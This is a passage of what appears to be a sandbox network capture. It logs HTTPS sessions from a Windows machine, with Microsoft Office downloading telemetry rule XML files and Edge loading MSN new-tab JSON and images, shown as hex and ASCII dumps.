3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.5	49855	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 7cd113ea-e01e-0052-21d5-33d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230627Z-174f7845968t42glhC1EWRa36w00000005dg000000001w6y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.5	49852	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 22e15e04-b01e-0070-3ed5-331cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230627Z-174f7845968psccphC1EWRuz9s00000005tg00000000fsmw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	49858	20.75.60.91	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:28 UTC	1009	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=11FAD531813A66492642C0058058675E&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=f670eeaf4ab44abfded817be1fb12d49 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1
2024-11-11 23:06:28 UTC	777	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2706 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"1,P425132678-T700343875-C128000000002116389+B+P60+S1"},{"BATCH_REDIRECT_STORE":"B128000000002116389+P0+S0"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 11 Nov 2024 23:06:27 GMT Connection: close
2024-11-11 23:06:28 UTC	2706	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 48 6f 74 73 70 6f 74 73 5c 22 2c 5c 22 75 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 73 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 74 69 74 6c 65 5c 22 3a 5c 22 56 61 6c 6c 65 20 64 65 20 6c 61 20 4c 75 6e 61 2c 20 43 68 69 6c 65 5c 22 2c 5c 22 63 74 61 5c 22 3a 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 5c 2f 73 65 61 72 63 68 3f 71 3d 56 61 6c 6c 65 2b 64 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"MSNAnaheimNewsNTPImageHotspots\",\"u\":\"MSNAnaheimNewsNTPImages\"}],\"ad\":{\"title\":\"Valle de la Luna, Chile\",\"cta\":\"https:\/\/www.bing.com\/search?q=Valle+d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	49878	104.117.182.72	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:28 UTC	634	OUT	GET /tenant/amp/entityid/BB1msOZ4.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:28 UTC	519	IN	HTTP/1.1 200 OK Last-Modified: Fri, 11 Oct 2024 07:35:05 GMT Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msOZ4 X-Source-Length: 49906 X-Datacenter: westus X-ActivityId: dcd65728-974b-44ba-9d3d-bdc8317c4d56 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 49906 Cache-Control: public, max-age=134363 Expires: Wed, 13 Nov 2024 12:25:51 GMT Date: Mon, 11 Nov 2024 23:06:28 GMT Connection: close
2024-11-11 23:06:28 UTC	15865	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-11 23:06:28 UTC	16384	IN	Data Raw: e6 4b 4f 82 d8 58 56 bc ba 96 da 13 be 3b 7f 69 bc ad c9 ad 4b ce 97 ad 23 5c 27 e4 c4 66 d1 9e f5 42 72 49 a4 f6 ef fc 2c 85 8e f7 6a fc da b3 46 92 4a fd 7b 17 e2 63 29 f4 4c cf 83 73 11 f5 35 d1 05 d5 7b 12 7f 62 dc a2 aa a3 7d bf 92 3c f9 65 d1 51 ef 7b 24 b8 9a c2 d3 b9 ee fa 2e 8b b7 bf c8 4d 7b 64 8b 46 71 11 e3 dc e9 9c e7 2e 3b 2f 5e e3 06 ee e4 ba f5 7e 5f 80 d4 f5 cd 47 8c b8 d3 ee ef 13 8e 95 2a 7b 3d ff 00 82 33 11 86 a6 79 f1 61 37 d0 f3 f2 2a e0 75 bd db 31 96 36 d7 96 e9 76 f7 1e 8a ee 78 f5 3f 73 92 ae 0e 5f cc fe 4b f8 98 e9 6b 75 b5 70 3a 17 fa 31 7d ce 51 7e 4f 89 15 6a d7 53 b4 3c 53 19 c7 84 4b 3c 79 5e 39 79 75 5f 8a 3a 30 7a 79 a7 2e 0b ed dc 71 c9 51 d9 c9 34 b2 ef d6 2f f3 25 a3 74 cf 72 69 4c ed d2 b3 3b b6 9e 84 d2 c7 08 c7 f9 Data Ascii: KOXV;iK#\'fBrI,jFJ{c)Ls5{b}<eQ{$.M{dFq.;/^~_G{=3ya7u16vx?s_Kkup:1}Q~OjS<SK<y^9yu_:0zy.qQ4/%triL;
2024-11-11 23:06:28 UTC	1369	IN	Data Raw: d6 77 71 b4 77 e7 93 eb b6 52 d9 25 1e 3f 92 66 3c c4 5c 96 fd cf e1 e4 79 98 bc 5f 97 c9 5e f1 4b 13 ea eb 52 7e d5 bf c8 f5 71 57 3b 93 1c 31 35 97 54 b7 71 7f 44 3a fc b8 1c 76 66 bc 63 18 e3 2f a5 e7 e9 6a d6 62 96 8b 67 84 70 9f 87 14 47 0f bd 8f fb 29 46 4d fd 3b 2e 1f c0 f1 79 99 2c 79 30 e6 c1 e8 e4 8f d6 9f 18 ce 0f 83 8f 73 5c 7a 33 db e7 32 c3 97 c9 cb 63 c7 6f 0e 39 ea c9 29 35 aa 79 1b de 6e ba 35 55 dc 8f 17 9c 83 fe a6 73 86 ce 94 f6 f6 7a 5e 7d f6 75 d2 df 3b f8 4c 4e 3f bb c3 d5 4f ec 98 88 fd d5 b5 62 7b 62 78 e6 be 0f b4 e5 1a 78 b1 ce 51 8d 7b b9 39 c6 5b a5 ef 6a 55 f1 e0 78 f9 21 85 63 c8 b4 a7 06 ee f7 ae 1c 17 de 91 de e6 eb 04 21 e9 2c 91 8b ba d3 ad b8 a7 6d 2e 09 70 f2 39 25 e9 38 e3 6d 25 6e a3 d3 6e bc 38 d5 33 c9 58 c5 a6 73 Data Ascii: wqwR%?f<\y_^KR~qW;15TqD:vfc/jbgpG)FM;.y,y0s\z32co9)5yn5Usz^}u;LN?Ob{bxxQ{9[jUx!c!,m.p9%8m%nn83Xs
2024-11-11 23:06:28 UTC	16288	IN	Data Raw: 6f ef f9 1f aa bc 06 12 e5 97 71 ed d3 f5 4d 6a 71 9c f8 bc b7 e8 74 2f f4 c4 78 6e 7e 45 3e 43 3c 3a 59 c9 3c 39 23 c6 32 5e cf c8 fd 7a 5c 94 5f 43 8e 7e 1d 17 d0 f7 d3 d5 e3 ea af bd e3 bf a5 d3 e9 b5 a3 de fc 9e 86 7e 8b 93 c2 61 2f d2 8f 2f 27 82 43 a2 6b b0 f7 53 d4 ba 7b 73 98 78 ed e9 ba d1 c2 6b 6f 73 e3 80 fa 0c 9e 0f 92 3f 4b f8 a3 cf 9f 87 f3 10 fd 37 d9 fc 4f 5d 7a 8d 1b f0 bd 7e 2f 25 fa 6d 7a 71 d3 b7 cb 7b cf 03 69 61 cb 1e 30 92 f6 18 9d e2 62 78 3c f3 13 5e 31 80 22 84 30 84 22 80 09 01 80 52 00 02 00 00 60 20 00 08 00 00 a8 05 43 02 89 a1 51 60 13 0c 9a 15 1a 88 33 86 54 49 a8 a8 a9 86 65 46 53 83 b8 c9 c5 f7 a7 4f e4 3a 15 03 83 a9 f3 99 e4 aa 53 73 5f ee e3 f1 3d 7e 5b c4 71 2b 59 b5 2f f0 e5 8d 4b ea a8 c9 56 9f 25 e6 b7 3e 74 44 98 Data Ascii: oqMjqt/xn~E>C<:Y<9#2^z\_C~~a//'CkS{sxkos?K7O]z~/%mzq{ia0bx<^1"0"R` CQ`3TIeFSO:Ss_=~[q+Y/KV%>tD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	49880	104.117.182.72	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:28 UTC	634	OUT	GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:28 UTC	515	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL Last-Modified: Thu, 07 Nov 2024 12:58:05 GMT X-Source-Length: 1658 X-Datacenter: eastus X-ActivityId: ba24fde8-14e0-48b8-a3cb-6556d76b4d9b Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 1658 Cache-Control: public, max-age=50023 Expires: Tue, 12 Nov 2024 13:00:11 GMT Date: Mon, 11 Nov 2024 23:06:28 GMT Connection: close
2024-11-11 23:06:28 UTC	1658	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 06 2f 49 44 41 54 58 c3 d5 57 7d 6c 14 45 14 7f 33 b3 bb 77 d7 2b a5 e5 a3 48 a9 7c c4 10 82 44 12 25 d8 18 4d 8a 5a 35 11 49 0d d2 26 fc 51 03 c6 04 c3 57 03 25 a0 50 b0 11 21 d4 a4 26 02 51 f0 0b 22 06 12 30 a6 84 18 48 8a 5a 08 22 88 c4 80 80 f6 0f 3e 5a 01 11 90 c2 41 da bb 9d dd 19 df cc ee 6d f7 bc 83 16 89 31 ee e5 dd 9b 9d db 9d df ef fd de bc b7 7b 00 ff f1 41 ee f6 86 8d 0d 17 f3 be ed 3c bf 2d 61 d1 32 37 6a 15 09 d3 e0 c4 20 27 a4 41 b7 44 fb f7 db b4 6b 56 49 d7 bf 42 a0 a1 41 d2 a1 a2 e3 a5 7d 7f b6 6f 3a 2f ec b8 99 df 1f 68 3c 0f 88 45 01 0c 0a 04 4d 32 72 81 30 da 50 50 3c 6a d3 8e Data Ascii: PNGIHDR szzbKGD/IDATXW}lE3w+H\|D%MZ5I&QW%P!&Q"0HZ">ZAm1{A<-a27j 'ADkVIBA}o:/h<EM2r0PP<j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	49876	104.117.182.72	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:28 UTC	633	OUT	GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:28 UTC	516	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Mon, 11 Nov 2024 13:51:58 GMT X-Datacenter: northeu X-ActivityId: 03b090a8-ff0d-477a-9433-19affde5f1c7 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAc9vHK X-Source-Length: 1218 Content-Length: 1218 Cache-Control: public, max-age=398731 Expires: Sat, 16 Nov 2024 13:51:59 GMT Date: Mon, 11 Nov 2024 23:06:28 GMT Connection: close
2024-11-11 23:06:28 UTC	1218	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 71 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20 Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<qiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	49879	104.117.182.72	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:28 UTC	634	OUT	GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:28 UTC	516	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6G Last-Modified: Sun, 10 Nov 2024 06:14:35 GMT X-Source-Length: 5699 X-Datacenter: eastap X-ActivityId: 96a315e5-981f-47e5-bbfa-17d63c15ba44 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 5699 Cache-Control: public, max-age=284916 Expires: Fri, 15 Nov 2024 06:15:04 GMT Date: Mon, 11 Nov 2024 23:06:28 GMT Connection: close
2024-11-11 23:06:28 UTC	5699	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 00 32 a0 03 00 04 00 00 00 01 00 00 00 32 00 00 00 00 86 f1 c2 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 Data Ascii: PNGIHDR22?gAMAa cHRMz&u0`:pQ<eXIfMM*JR(iZHH22pHYs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	49877	104.117.182.72	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:28 UTC	634	OUT	GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:28 UTC	515	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Wed, 16 Oct 2024 13:27:27 GMT X-Datacenter: westus X-ActivityId: e052a22a-abc6-4901-8eb3-22f69d832642 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1hk7Sh X-Source-Length: 6962 Content-Length: 6962 Cache-Control: public, max-age=94811 Expires: Wed, 13 Nov 2024 01:26:39 GMT Date: Mon, 11 Nov 2024 23:06:28 GMT Connection: close
2024-11-11 23:06:28 UTC	6962	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 0c 3f 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 84 12 40 40 4a e8 4d 10 a9 01 a4 84 d0 42 ef 08 36 42 12 20 94 18 03 41 c5 8e 2e 2a b8 76 b1 80 0d 5d 15 51 b0 02 62 47 ec 2c 8a bd 2f 16 54 94 75 b1 60 57 de a4 80 ae fb ca f7 e6 fb e6 ce 7f ff 39 f3 9f 33 e7 ce dc 7b 07 00 8d e3 3c 89 24 0f d5 04 20 5f 5c 28 8d 0f 0d 64 8e 4a 4d 63 92 9e 02 0c d0 01 15 38 01 4b 1e bf 40 c2 8e 8d 8d 04 b0 0c b4 7f 2f ef ae 03 44 de 5e 71 94 6b fd b3 ff bf 16 2d 81 b0 80 0f 00 12 0b 71 86 a0 80 9f 0f f1 7e 00 f0 2a be 44 5a 08 00 51 ce 5b 4c 2a 94 c8 31 ac 40 47 0a 03 84 78 be 1c 67 29 71 95 1c 67 28 f1 6e 85 4d 62 3c 07 Data Ascii: PNGIHDR22??iCCPICC ProfileHWXS[@@JMB6B A.v]QbG,/Tu`W93{<$ _\(dJMc8K@/D^qk-q~DZQ[L*1@Gxg)qg(nMb<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	49875	104.117.182.72	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
